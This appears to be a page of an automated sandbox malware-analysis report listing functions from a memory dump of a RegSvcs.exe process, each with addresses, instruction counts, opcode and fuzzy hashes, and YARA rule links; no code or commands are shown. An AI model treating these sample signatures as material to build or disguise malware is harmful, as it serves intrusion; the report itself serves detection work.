                                                              • Instruction ID: 90b3ef44723d378e3999032160787dba4385fcc98d45d2a54f5932923df70687
                                                              • Opcode Fuzzy Hash: 6c39258056f666818ad8ca7914265b1b3d9fdb20952ff3d48ce7b7d603b6b956
                                                              • Instruction Fuzzy Hash: F6F06270A0124AEFCB14EFA9C915A5EB7B4FF58300F008066B955EB395DA78EA01CB94
                                                              Function 015947FB Relevance: .0, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 595138f6757c0a88f0012d15e70dfb387187931e272df8b5e609c0a02175ce52
                                                              • Instruction ID: d09f47e7374f148e87aca9b6f50b7eed0f9673f8156f8289e63557c4e9fd70ca
                                                              • Opcode Fuzzy Hash: 595138f6757c0a88f0012d15e70dfb387187931e272df8b5e609c0a02175ce52
                                                              • Instruction Fuzzy Hash: E6F0B4319166D19FEF32CB5CC654B297BD8FB00630F084D6AD5498F502D724DC82C652
                                                              Function 01650115 Relevance: .0, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7643b1d28d5f24657e633881b2a2c7b4598c12dc3a321119a55b38679a8f06d1
                                                              • Instruction ID: 88cf8269244027ba295e7cc29f4b521745a5d63e39bb536dec4c9e5fcb2b58cd
                                                              • Opcode Fuzzy Hash: 7643b1d28d5f24657e633881b2a2c7b4598c12dc3a321119a55b38679a8f06d1
                                                              • Instruction Fuzzy Hash: EDF027264156C12BCF726B6CEC503D53B56A752214F0A2189DDA05B305C674C493C3AA
                                                              Function 015CC5ED Relevance: .0, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 823675eb2c2e550174d758043ca7b5b285f0e76b37ab28020a5468ea3dfb912a
                                                              • Instruction ID: 49d4c569dc1c99abe9edc6e3c43eb6d76c82b8f227f68ad005c634f0bb3a0ae4
                                                              • Opcode Fuzzy Hash: 823675eb2c2e550174d758043ca7b5b285f0e76b37ab28020a5468ea3dfb912a
                                                              • Instruction Fuzzy Hash: A2F0E2725116919FE7229FACC388B297BD8BB40FA0F0CA82DD40ECF512C660E8C0CA50
                                                              Function 015D2619 Relevance: .0, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                              • Instruction ID: 83f55c39bcd2839006edffd4a93fb3aba2f55ebad65de306170161d1e2635aa4
                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                              • Instruction Fuzzy Hash: A8E092323406022BE7219E5D8C80F47776EAFD2B10F044079B6045E251CAE29C0983A4
                                                              Function 01626030 Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                              • Instruction ID: c590b10926a6b011ebb9bfdb50a7500c063f263b843bb46ca0d4d00809975ab4
                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                              • Instruction Fuzzy Hash: D7F0A0721006149FE3218F09DE40F52B7F8EB05364F41C025EA088B260D37DEC40DFA4
                                                              Function 01590710 Relevance: .0, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                              • Instruction ID: fb9945a591913aa498260b12640a9f8965796502984097be0877a5b027982a8a
                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                              • Instruction Fuzzy Hash: A8F0E53A204351DBDF1ACF19D440A9D7BE8FB41360F040854F8468F341E731E981CB95
                                                              Function 015C49D0 Relevance: .0, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                              • Instruction ID: f0614b1097e27d13e36f26bc61e31a781d5d7f917d832d6ad7245e29ea48bdbd
                                                              • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                              • Instruction Fuzzy Hash: 0CE09232254146AFD3211E9D8C10F7A77A7BBD0BA0F15042DE2028F150DBB0DC40C798
                                                              Function 0163678E Relevance: .0, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                              • Instruction ID: e871e06ed3859508619dd7ff3c6efa906bab7ac56823ec646dd6b30e0c4c4617
                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                              • Instruction Fuzzy Hash: F7E04F72A40115BFDB22A799CD05FAABEBCEBD4EA0F554095B602EB190E570DE00D6A0
                                                              Function 015925E0 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c4ec20401a4f00edc4d3c40b801d16ef5348a1ab8573d48b789ab28d9976608a
                                                              • Instruction ID: 12a40c380665d03385fa02b3dc6404475c3d535ef0a8ab4f8f48619b4813c8ea
                                                              • Opcode Fuzzy Hash: c4ec20401a4f00edc4d3c40b801d16ef5348a1ab8573d48b789ab28d9976608a
                                                              • Instruction Fuzzy Hash: B8E09232100595ABC721BB29DD11F8A77AAFFA1364F014515F1555B190CB70AC50C7C4
                                                              Function 01614000 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                              • Instruction ID: 785ff1543a9825f16b56d8e3d075e8457bc4151e1c9c736dd5ec257bed8e9027
                                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                              • Instruction Fuzzy Hash: 72E0C2343003058FE715CF1AC450B627BB6BFD5B11F28C068A9488F309EB32E882CB40
                                                              Function 015CCA38 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d19e0ab3ae671aaf5ea80f7a4631cd3ce87947984cc8f4cb5ecafa0dfb52c916
                                                              • Instruction ID: 3db74a9231e3309dfc046a1b770cf4f25b46f39fee9252b8834c1436e067d07a
                                                              • Opcode Fuzzy Hash: d19e0ab3ae671aaf5ea80f7a4631cd3ce87947984cc8f4cb5ecafa0dfb52c916
                                                              • Instruction Fuzzy Hash: 3DD02B324D14217ECB39E96CBC08FEB3A99BB80B20F018864F10CDA010D594CC8182C4
                                                              Function 0158823B Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                              • Instruction ID: 8f0e305fdd231c88e6ad6e7105bd7ddcd115faadcf7d48a7da8b6cca20e79abe
                                                              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                              • Instruction Fuzzy Hash: 0CE0C232440A22EFEB323F19DC00F5576E1FF94B11F504C2AE0C22E0A487B0AC81CB44
                                                              Function 01592050 Relevance: .0, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e94784816c1a202c8c2d23c53a1babc29b9342c1da4805863c07933b7b7ccb5
                                                              • Instruction ID: ed4b34b8b093bc9a7e06ea2da905689c451e38a437875cdce30f169f5b1c8658
                                                              • Opcode Fuzzy Hash: 6e94784816c1a202c8c2d23c53a1babc29b9342c1da4805863c07933b7b7ccb5
                                                              • Instruction Fuzzy Hash: ADE08C321004A16BC721FA5DED10E4A73AAFFE5260F000221F1508B690CA60AC41C795
                                                              Function 015C8A90 Relevance: .0, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                              • Instruction ID: 1ec6650b0915392fa18e0428117154c189b68e74955eb0ca8da5256637350019
                                                              • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                              • Instruction Fuzzy Hash: CEE08633111A148BC728DE5CD911B7677E4FF45B30F09463EA6134B790C574E944C794
                                                              Function 015E6AA4 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                              • Instruction ID: e0604574364ca9917b521185268307991753b75e504d69b5134239c376aa6a4b
                                                              • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                              • Instruction Fuzzy Hash: FCD05E36911A50EFC3329F1BEE04C17FBF9FFD4A50709062EA54587920C670A806CBA0
                                                              Function 015CE59C Relevance: .0, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                              • Instruction ID: 6c36053f0a5f77db29a7c20267df18aca3f93866cf8f2535144126d27d114eae
                                                              • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                              • Instruction Fuzzy Hash: 47D0A932664620AFD772AA1CFC00FC373EABB88724F060459B008CB1A1C360AC81CA84
                                                              Function 0160E908 Relevance: .0, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                              • Instruction ID: 6010ea78b23dd19496801a6139fa296e7fd34204ad16b3d688f7b4d4e78d8c9f
                                                              • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                              • Instruction Fuzzy Hash: 02E0EC35950685AFDF57DF99DA40F5EBBB5FB94B40F150458A1085F760C725AD00CB40
                                                              Function 0158A0E3 Relevance: .0, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                              • Instruction ID: 825880ed5741cdc4aac78e71acdeb43f70be195a92d5c6644828a193599619db
                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                              • Instruction Fuzzy Hash: 0BD02232222031E7CB286655AC10F6BB906BFC0A94F0A002E340AAB800C1048C43C2E0
                                                              Function 015CA830 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                              • Instruction ID: 2fa26d15f785120ec18f3ab6f7575dc7b4176845ad096b03dae116b254a8e9e6
                                                              • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                              • Instruction Fuzzy Hash: 58D012371E054DBBCB119F66DC01F957BA9FBA4BA0F444020B5048B5A0C63AE950D584
                                                              Function 015CCA24 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fb29844d38a1584afe132ef9516276f3ed454406c3d1a3f94fd294ac1a50fa7a
                                                              • Instruction ID: 947b91c54d802c05fd1419757f259393ed52c2cf8551192e1c6dba43fa456fb8
                                                              • Opcode Fuzzy Hash: fb29844d38a1584afe132ef9516276f3ed454406c3d1a3f94fd294ac1a50fa7a
                                                              • Instruction Fuzzy Hash: 3CD05E309520029FDF2BCF48CD2493E76B4FF10A40B44106CE60056520D364D8118600
                                                              Function 015A02A0 Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                              • Instruction ID: 82c5409723fa28ea16e91945672af4918bea3b98d56a786d27baa5532a79deac
                                                              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                              • Instruction Fuzzy Hash: 23D09235262A80CFD62A8B0DC5A4B1A33A4BB44A44FC10890E501CBB62D628D940CA00
                                                              Function 015CC700 Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                              • Instruction ID: b3023dcff4b48f0aa33b8c09e1b73c57248b87c66b3b405e5f460c6f5009ffbe
                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                              • Instruction Fuzzy Hash: BAC01232190644AFC7119A95DD01F0577A9FB98B40F400021F2044B570C531E810D644
                                                              Function 015B0310 Relevance: .0, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                              • Instruction ID: cfa90935653e1f96ba99cddd05dabf2e0da868f8dab5a743f52e084dd684df16
                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                              • Instruction Fuzzy Hash: 84D01236100249EFCB01DF45C890D9B773AFBD8710F108019FD190B6508A31ED62DA50
                                                              Function 01590750 Relevance: .0, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                              • Instruction ID: 2ddb52f0178847bdcd60acb368396f35d5691dc1ebf857a686966725a0dc4cd8
                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                              • Instruction Fuzzy Hash: FDC04C75751942CFCF15DB59D294F4977E4F744744F151890E805CF721E624E811CA10
                                                              Function 015D4340 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 94347bc8fa33b41ba6e12a712de4f1edb88678d86355f8b58366af632f709f33
                                                              • Instruction ID: 24b509d7ad01b6683c582648da84ac9f27d8fbfb27457060e96d1accfcf4fcfc
                                                              • Opcode Fuzzy Hash: 94347bc8fa33b41ba6e12a712de4f1edb88678d86355f8b58366af632f709f33
                                                              • Instruction Fuzzy Hash: 3C900231A05800129144725848885464085B7E0311B59C411E0424954CCA548A565361
                                                              Function 015D4650 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b68dde35d7436ee83983c0b8acd97f72298c6904471b4fd8ccf30c3fb9a42357
                                                              • Instruction ID: a57971b232265391d6aa44d401f57e352d1f022e7fea5d57f8fd1389c21f21c5
                                                              • Opcode Fuzzy Hash: b68dde35d7436ee83983c0b8acd97f72298c6904471b4fd8ccf30c3fb9a42357
                                                              • Instruction Fuzzy Hash: BB900261A01500424144725848084066085B7E1311399C515A0554960CC65889559369
                                                              Function 015D2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7d2da81e44176e18e9220a696409bafd716d725121281961c9fffbaae946fdc2
                                                              • Instruction ID: f0b5f0935cc2dc9d4071a46ee16c8387cc77a1a461f7a89fb9a609990cdc0c89
                                                              • Opcode Fuzzy Hash: 7d2da81e44176e18e9220a696409bafd716d725121281961c9fffbaae946fdc2
                                                              • Instruction Fuzzy Hash: B490023160140802D1847258440864A0085A7D1311F99C415A0025A54DCA558B5977A1
                                                              Function 015D2BE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0470f8d4fa1d84de2d2b54bfd885c4cdc05bb9920ce2b70264fe23acf4c1bea8
                                                              • Instruction ID: 614686f1dc46d96de1cfb479a1cfecf753be10570fcb73329dfa6eba08d8e168
                                                              • Opcode Fuzzy Hash: 0470f8d4fa1d84de2d2b54bfd885c4cdc05bb9920ce2b70264fe23acf4c1bea8
                                                              • Instruction Fuzzy Hash: 9090023160544842D14472584408A460095A7D0315F59C411A0064A94DD6658E55B761
                                                              Function 015D2B80 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7d67d2923039c1429b3438ba8ab924b9c468a03824f0aff6730d8bdd826f0b59
                                                              • Instruction ID: 985e6b7801b1648b36a9335ceebd4114b4055a57615b1fe45ba16efd288526b3
                                                              • Opcode Fuzzy Hash: 7d67d2923039c1429b3438ba8ab924b9c468a03824f0aff6730d8bdd826f0b59
                                                              • Instruction Fuzzy Hash: A490023160140802D108725848086860085A7D0311F59C411A6024A55ED6A589917231
                                                              Function 015D2BA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9f54186e4c01932bbba624496a5e5bc06748cbd6d4ed92341a4b1c4f2c0983aa
                                                              • Instruction ID: de08745e8afd6f0ed004d202abe6a3cade857f7759b5053ceda64f2c4fbe7644
                                                              • Opcode Fuzzy Hash: 9f54186e4c01932bbba624496a5e5bc06748cbd6d4ed92341a4b1c4f2c0983aa
                                                              • Instruction Fuzzy Hash: 8A900231A0540802D154725844187460085A7D0311F59C411A0024A54DC7958B5577A1
                                                              Function 015D2AD0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b7d1248974e066b6edd72bee313a73e1e19e7ccb3f634c3b93a52b10b829d434
                                                              • Instruction ID: 9ee5cf1ad4533ba3d69f8ab34d69679e2ad236c40905d0591cdb2a83abe633d6
                                                              • Opcode Fuzzy Hash: b7d1248974e066b6edd72bee313a73e1e19e7ccb3f634c3b93a52b10b829d434
                                                              • Instruction Fuzzy Hash: F4900225611400030109B658070850700C6A7D5361359C421F1015950CD66189615221
                                                              Function 015D2AF0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 434a5a2c959f85dd26834b610c6aa9d3c59813da45d3a3c50779a38f36218b36
                                                              • Instruction ID: 695b0a4eb4e195edb3a8557a0ef80084c185365022a8f947cdb642611775ead6
                                                              • Opcode Fuzzy Hash: 434a5a2c959f85dd26834b610c6aa9d3c59813da45d3a3c50779a38f36218b36
                                                              • Instruction Fuzzy Hash: 2A900225621400020149B658060850B04C5B7D6361399C415F1416990CC66189655321
